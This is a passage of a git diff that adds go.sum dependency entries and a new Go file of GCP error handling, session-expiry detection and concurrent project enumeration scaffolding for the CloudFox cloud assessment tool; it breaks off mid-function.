h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE= @@ -437,18 +489,29 @@ go.opentelemetry.io/otel/trace v1.39.0 h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6 go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.17.0/go.mod h1:gCAAfMLgwOJRpTjQ2zCCt2OcSfYMTeZVSRtQlPC7Nq4= golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU= golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9 h1:MDfG8Cvcqlt9XXrmEiD4epKn7VJHZO84hejP9Jmp0MM= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9/go.mod h1:EPRbTFwzwjXj9NpYyyrvenVh9Y+GFeEvMNh7Xuz7xgU= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= golang.org/x/mod v0.31.0 h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI= golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= @@ -456,14 +519,20 @@ golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU= golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4= golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= @@ -499,26 +568,50 @@ golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY= golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI= golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= +golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= +golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA= golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/api v0.257.0 h1:8Y0lzvHlZps53PEaw+G29SsQIkuKrumGWs9puiexNAA= google.golang.org/api v0.257.0/go.mod h1:4eJrr+vbVaZSqs7vovFd1Jb/A6ml6iw2e6FBYf3GAO4= +google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= +google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= +google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= +google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217 h1:GvESR9BIyHUahIb0NcTum6itIWtdoglGX+rnGxm2934= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:yJ2HH4EHEDTd3JiLmhds6NkJ17ITVYOdV3m3VKOnws0= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk= +google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= +google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= google.golang.org/grpc v1.77.0 h1:wVVY6/8cGA6vvffn+wWK5ToddbgdU3d8MNENr4evgXM= google.golang.org/grpc v1.77.0/go.mod h1:z0BY1iVj0q8E1uSQCjL9cppRj+gnZjzDnzV0dHhrNig= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= @@ -529,3 +622,5 @@ gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/internal/gcp/base.go b/internal/gcp/base.go new file mode 100644 index 00000000..2c6a8dc2 --- /dev/null +++ b/internal/gcp/base.go @@ -0,0 +1,570 @@ +package gcpinternal + +import ( + "context" + "errors" + "fmt" + "os" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + "github.com/spf13/cobra" + "google.golang.org/api/googleapi" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// ------------------------------ +// Common GCP API Error Types +// ------------------------------ +var ( + ErrAPINotEnabled = errors.New("API not enabled") + ErrPermissionDenied = errors.New("permission denied") + ErrNotFound = errors.New("resource not found") + ErrVPCServiceControls = errors.New("blocked by VPC Service Controls") + ErrSessionInvalid = errors.New("session invalid") +) + +// ------------------------------ +// Session Error Detection +// ------------------------------ +// These functions detect when GCP credentials are invalid/expired +// and exit with clear messages to prevent incomplete data. + +// IsGCPSessionError checks if an error indicates a session/authentication problem. +// If true, the program should exit with a clear message - continuing would produce incomplete results. +func IsGCPSessionError(err error) bool { + if err == nil { + return false + } + + // Check for gRPC status errors + if grpcStatus, ok := status.FromError(err); ok { + switch grpcStatus.Code() { + case codes.Unauthenticated: + return true + } + } + + // Check for REST API errors (googleapi.Error) + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + // 401 Unauthorized is always a session error + if googleErr.Code == 401 { + return true + } + } + + // Check error message for common session issues + errStr := strings.ToLower(err.Error()) + + // Authentication failures + if strings.Contains(errStr, "unauthenticated") || + strings.Contains(errStr, "invalid_grant") || + strings.Contains(errStr, "token has been expired or revoked") || + strings.Contains(errStr, "token expired") || + strings.Contains(errStr, "refresh token") && strings.Contains(errStr, "expired") || + strings.Contains(errStr, "credentials") && strings.Contains(errStr, "expired") || + strings.Contains(errStr, "unable to authenticate") || + strings.Contains(errStr, "authentication failed") || + strings.Contains(errStr, "could not find default credentials") || + strings.Contains(errStr, "application default credentials") && strings.Contains(errStr, "not found") { + return true + } + + // Connection issues that indicate GCP is unreachable + if strings.Contains(errStr, "connection refused") || + strings.Contains(errStr, "no such host") || + strings.Contains(errStr, "connection reset") { + return true + } + + // OAuth issues + if strings.Contains(errStr, "oauth2") && (strings.Contains(errStr, "token") || strings.Contains(errStr, "expired")) { + return true + } + + return false +} + +// CheckGCPSessionError checks if an error is a session error and exits if so. +// Call this on every API error to ensure session issues are caught immediately. +// Returns true if error was a session error (program will have exited). +// Returns false if error is not a session error (caller should handle normally). +func CheckGCPSessionError(err error, logger internal.Logger, moduleName string) bool { + if !IsGCPSessionError(err) { + return false + } + + // Determine the specific session issue for a helpful message + errStr := strings.ToLower(err.Error()) + var reason string + + switch { + case strings.Contains(errStr, "invalid_grant") || strings.Contains(errStr, "token has been expired or revoked"): + reason = "Your GCP credentials have expired or been revoked" + case strings.Contains(errStr, "refresh token") && strings.Contains(errStr, "expired"): + reason = "Your refresh token has expired - please re-authenticate" + case strings.Contains(errStr, "could not find default credentials") || strings.Contains(errStr, "application default credentials"): + reason = "No GCP credentials found - run: gcloud auth application-default login" + case strings.Contains(errStr, "unauthenticated") || strings.Contains(errStr, "authentication failed"): + reason = "Authentication failed - your credentials are invalid" + case strings.Contains(errStr, "connection refused") || strings.Contains(errStr, "no such host"): + reason = "Cannot connect to GCP APIs - check your network connection" + default: + reason = "Session error detected - credentials may be invalid" + } + + logger.ErrorM("", moduleName) + logger.ErrorM("╔════════════════════════════════════════════════════════════════╗", moduleName) + logger.ErrorM("║ SESSION ERROR DETECTED ║", moduleName) + logger.ErrorM("╠════════════════════════════════════════════════════════════════╣", moduleName) + logger.ErrorM(fmt.Sprintf("║ %s", reason), moduleName) + logger.ErrorM("║ ║", moduleName) + logger.ErrorM("║ Your GCP session is no longer valid. ║", moduleName) + logger.ErrorM("║ Results may be incomplete - please fix and re-run. ║", moduleName) + logger.ErrorM("╠════════════════════════════════════════════════════════════════╣", moduleName) + logger.ErrorM("║ Common fixes: ║", moduleName) + logger.ErrorM("║ • Re-authenticate: gcloud auth login ║", moduleName) + logger.ErrorM("║ • ADC login: gcloud auth application-default login ║", moduleName) + logger.ErrorM("║ • Check account: gcloud auth list ║", moduleName) + logger.ErrorM("║ • Service account: check GOOGLE_APPLICATION_CREDENTIALS ║", moduleName) + logger.ErrorM("╚════════════════════════════════════════════════════════════════╝", moduleName) + logger.ErrorM("", moduleName) + logger.ErrorM(fmt.Sprintf("Original error: %v", err), moduleName) + + os.Exit(1) + return true // Never reached, but satisfies compiler +} + +// ParseGCPError converts GCP API errors into cleaner, standardized error types +// This should be used by all GCP service modules for consistent error handling +// Handles both REST API errors (googleapi.Error) and gRPC errors (status.Error) +func ParseGCPError(err error, apiName string) error { + if err == nil { + return nil + } + + // Check for gRPC status errors (used by Cloud Asset, Spanner, and other gRPC-based APIs) + if grpcStatus, ok := status.FromError(err); ok { + errStr := err.Error() + + switch grpcStatus.Code() { + case codes.PermissionDenied: + // Check for SERVICE_DISABLED in error details or message + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Check for quota project requirement (API not enabled or misconfigured) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (set quota project with: gcloud auth application-default set-quota-project PROJECT_ID)", ErrAPINotEnabled, apiName) + } + return ErrPermissionDenied + + case codes.NotFound: + return ErrNotFound + + case codes.Unauthenticated: + return fmt.Errorf("authentication failed - check credentials") + + case codes.ResourceExhausted: + return fmt.Errorf("rate limited - too many requests") + + case codes.Unavailable, codes.Internal: + return fmt.Errorf("GCP service error: %s", grpcStatus.Message()) + + case codes.InvalidArgument: + return fmt.Errorf("bad request: %s", grpcStatus.Message()) + } + + // Default: return cleaner error message + return fmt.Errorf("gRPC error (%s): %s", grpcStatus.Code().String(), grpcStatus.Message()) + } + + // Check for REST API errors (googleapi.Error) + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + errStr := googleErr.Error() + + switch googleErr.Code { + case 403: + // Check for SERVICE_DISABLED first - this is usually the root cause + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Check for VPC Service Controls + if strings.Contains(errStr, "VPC_SERVICE_CONTROLS") || + strings.Contains(errStr, "SECURITY_POLICY_VIOLATED") || + strings.Contains(errStr, "organization's policy") { + return ErrVPCServiceControls + } + // Permission denied + if strings.Contains(errStr, "PERMISSION_DENIED") || + strings.Contains(errStr, "does not have") || + strings.Contains(errStr, "permission") { + return ErrPermissionDenied + } + // Generic 403 + return ErrPermissionDenied + + case 404: + return ErrNotFound + + case 400: + return fmt.Errorf("bad request: %s", googleErr.Message) + + case 429: + return fmt.Errorf("rate limited - too many requests") + + case 500, 502, 503, 504: + return fmt.Errorf("GCP service error (code %d)", googleErr.Code) + } + + // Default: return cleaner error message + return fmt.Errorf("API error (code %d): %s", googleErr.Code, googleErr.Message) + } + + // Fallback: check error string for common patterns + errStr := err.Error() + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Check for quota project requirement (common with ADC) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (set quota project with: gcloud auth application-default set-quota-project PROJECT_ID)", ErrAPINotEnabled, apiName) + } + if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "PermissionDenied") { + return ErrPermissionDenied + } + + return err +} + +// IsPermissionDenied checks if an error is a permission denied error +func IsPermissionDenied(err error) bool { + return errors.Is(err, ErrPermissionDenied) +} + +// IsAPINotEnabled checks if an error is an API not enabled error +func IsAPINotEnabled(err error) bool { + return errors.Is(err, ErrAPINotEnabled) +} + +// HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue +// Returns false if the error is fatal and the caller should stop processing +// IMPORTANT: This now checks for session errors first and will exit if credentials are invalid! +func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { + if err == nil { + return true // No error, continue + } + + // CRITICAL: Check for session errors first - exit immediately if credentials are invalid + // This prevents incomplete data from being saved + CheckGCPSessionError(err, logger, moduleName) + + // Parse the raw GCP error into a standardized error type + parsedErr := ParseGCPError(err, "") + + switch { + case errors.Is(parsedErr, ErrAPINotEnabled): + logger.ErrorM(fmt.Sprintf("%s - API not enabled", resourceDesc), moduleName) + return false // Can't continue without API enabled + + case errors.Is(parsedErr, ErrVPCServiceControls): + logger.ErrorM(fmt.Sprintf("%s - blocked by VPC Service Controls", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(parsedErr, ErrPermissionDenied): + logger.ErrorM(fmt.Sprintf("%s - permission denied", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(parsedErr, ErrNotFound): + // Not found is often expected, don't log as error + return true + + default: + // For unknown errors, log a concise message without the full error details + logger.ErrorM(fmt.Sprintf("%s - error occurred", resourceDesc), moduleName) + return true // Continue with other resources + } +} + +// ------------------------------ +// CommandContext holds all common initialization data for GCP commands +// ------------------------------ +type CommandContext struct { + // Context and logger + Ctx context.Context + Logger internal.Logger + + // Project information + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration flags + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + FlatOutput bool // When true, use legacy flat output structure + + // Hierarchy support for per-project output + Hierarchy *ScopeHierarchy // Populated by DetectScopeHierarchy +} + +// ------------------------------ +// BaseGCPModule - Embeddable struct with common fields for all GCP modules +// ------------------------------ +// This struct eliminates duplicate field declarations across modules. +// Modules embed this struct instead of declaring these fields individually. +// +// Usage: +// +// type BucketsModule struct { +// gcpinternal.BaseGCPModule // Embed the base fields +// +// // Module-specific fields +// Buckets []BucketInfo +// mu sync.Mutex +// } +type BaseGCPModule struct { + // Project and identity + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + FlatOutput bool // When true, use legacy flat output structure + + // Hierarchy support for per-project output + Hierarchy *ScopeHierarchy // Populated by DetectScopeHierarchy + + // Progress tracking (AWS/Azure style) + CommandCounter internal.CommandCounter +} + +// GetProjectName returns the display name for a project ID, falling back to the ID if not found +func (b *BaseGCPModule) GetProjectName(projectID string) string { + if b.ProjectNames != nil { + if name, ok := b.ProjectNames[projectID]; ok { + return name + } + } + return projectID +} + +// ------------------------------ +// NewBaseGCPModule - Helper to create BaseGCPModule from CommandContext +// ------------------------------ +func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { + return BaseGCPModule{ + ProjectIDs: cmdCtx.ProjectIDs, + ProjectNames: cmdCtx.ProjectNames, + Account: cmdCtx.Account, + Verbosity: cmdCtx.Verbosity, + WrapTable: cmdCtx.WrapTable, + OutputDirectory: cmdCtx.OutputDirectory, + Format: cmdCtx.Format, + Goroutines: cmdCtx.Goroutines, + FlatOutput: cmdCtx.FlatOutput, + Hierarchy: cmdCtx.Hierarchy, + } +} + +// BuildPathBuilder creates a PathBuilder function for hierarchical output +// This function returns a closure that builds paths based on the module's configuration +func (b *BaseGCPModule) BuildPathBuilder() internal.PathBuilder { + return func(scopeType string, scopeID string) string { + if b.Hierarchy == nil { + // Fallback to flat output if no hierarchy is available + return BuildFlatPath(b.OutputDirectory, b.Account, &ScopeHierarchy{}) + } + return BuildHierarchicalPath(b.OutputDirectory, b.Account, b.Hierarchy, scopeType, scopeID) + } +} + +// ------------------------------ +// ProjectProcessor - Callback function type for processing individual projects +// ------------------------------ +type ProjectProcessor func(ctx context.Context, projectID string, logger internal.Logger) + +// ------------------------------ +// RunProjectEnumeration - Orchestrates enumeration across multiple projects with concurrency +// ------------------------------ +// This method centralizes the project enumeration orchestration pattern. +// It handles WaitGroup, semaphore, spinner, and CommandCounter management automatically. +// +// Usage: +// +// func (m *StorageModule) Execute(ctx context.Context, logger internal.Logger) { +// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGE_MODULE_NAME, m.processProject) +// m.writeOutput(ctx, logger) +// } +func (b *BaseGCPModule) RunProjectEnumeration( + ctx context.Context, + logger internal.Logger, + projectIDs []string, + moduleName string, + processor ProjectProcessor, +) { + logger.InfoM(fmt.Sprintf("Enumerating resources for %d project(s)", len(projectIDs)), moduleName) + + // Setup synchronization primitives + var wg sync.WaitGroup + semaphore := make(chan struct{}, b.Goroutines) + + // Start progress spinner + spinnerDone := make(chan bool) + go internal.SpinUntil(moduleName, &b.CommandCounter, spinnerDone, "projects") + + // Process each project with goroutines + for _, projectID := range projectIDs { + b.CommandCounter.Total++ + b.CommandCounter.Pending++ + wg.Add(1) + + go func(project string) { + defer func() { + b.CommandCounter.Executing-- + b.CommandCounter.Complete++ + wg.Done() + }() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + b.CommandCounter.Pending-- + b.CommandCounter.Executing++ + + // Call the module-specific processor + processor(ctx, project, logger) + }(projectID) + } + + // Wait for all projects to complete + wg.Wait() + + // Stop spinner + spinnerDone <- true + <-spinnerDone +} + +// ------------------------------ +// parseMultiValueFlag parses a flag value that can contain comma-separated +// and/or space-separated values +// ------------------------------ +func parseMultiValueFlag(flagValue string) []string { + if flagValue == "" { + return nil + } + + // Replace commas with spaces, then split by whitespace + normalized := 